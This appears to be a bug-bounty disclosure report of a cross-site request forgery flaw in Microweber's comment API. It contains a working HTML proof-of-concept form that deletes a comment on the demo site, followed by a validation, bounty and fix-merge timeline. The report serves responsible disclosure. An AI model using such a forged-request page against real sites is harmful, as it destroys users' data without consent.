Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Oct 22nd 2021


Description

Hello Microweber team

I found a CSRF on deleting the comments :

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/post_comment">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

after you run this PoC.html you can see that the comment with id 1 will be deleted.

We have contacted a member of the microweber team and are waiting to hear back a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2cdf57 a month ago
Peter Ivanov has been awarded the fix bounty
manage.php#L1-L11 has been validated
Model.php#L1-L63 has been validated
functions.php#L1-L200 has been validated
admin.php#L1-L18 has been validated
Api.php#L1-L241 has been validated
view.php#L1-L57 has been validated
Controller.php#L1-L32 has been validated